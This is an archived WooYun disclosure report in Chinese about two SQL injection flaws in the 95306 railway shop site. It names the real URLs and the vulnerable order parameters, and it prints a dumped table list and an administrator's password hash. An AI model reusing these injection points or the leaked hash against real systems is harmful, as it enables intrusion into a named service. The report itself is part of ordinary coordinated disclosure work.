中国铁路95306网某站两处sql注入

编号122840
Urlhttp://www.wooyun.org/bug.php?action=view&id=122840
漏洞状态厂商已经确认
漏洞标题中国铁路95306网某站两处sql注入
漏洞类型SQL注射漏洞
厂商12306
白帽子wps2015
提交日期2015-06-26 11:34:00
公开日期2015-08-15 09:40:00
修复时间(not set)
确认时间2015-07-01 00:00:00
Confirm Spend5
漏洞标签php+字符类型注射
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank5
漏洞简介
偶然听说新火车票上居然打广告,大家能忍?
漏洞细节

问题出在95306商城站:http://xsp.95306.cn/
先注册一个账号wooyun wooyun

1.png


在商城随意点击商品,添加到购物车,然后点击提交订单,进入支付页面
http://xsp.95306.cn/payto.asp?orderlist=2015626181159

2.png


orderlist存在注入,字符型

3.png


Database: stepgozsdata
[24 tables]
+------------------+
| KDZF |
| about |
| adkefu |
| admin |
| banner |
| cart |
| complain |
| hzxx |
| i_pic |
| keywords |
| msg |
| news |
| orderfahuo |
| orderlist |
| pro |
| pro_addattention |
| pro_bclass |
| pro_brand |
| pro_class |
| pro_consultation |
| pro_fav |
| pro_score |
| vip |
| vip_recived |
+------------------+


订单神马的是只有几千单,没开多久呀,管理员
+----+------------------+-----------+
| id | adminpwd | adminname |
+----+------------------+-----------+
| 1 | 7a57a5a743894a0e | admin |
+----+------------------+-----------+
另一处sql注入点:http://xsp.95306.cn/order_main.asp?id=2015626172159
位于查看订单处

POC

4.png

修复方案

过滤

状态信息 2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开
厂商回复谢谢
回应信息危害等级:低漏洞Rank:5 确认时间:2015-07-01 09:38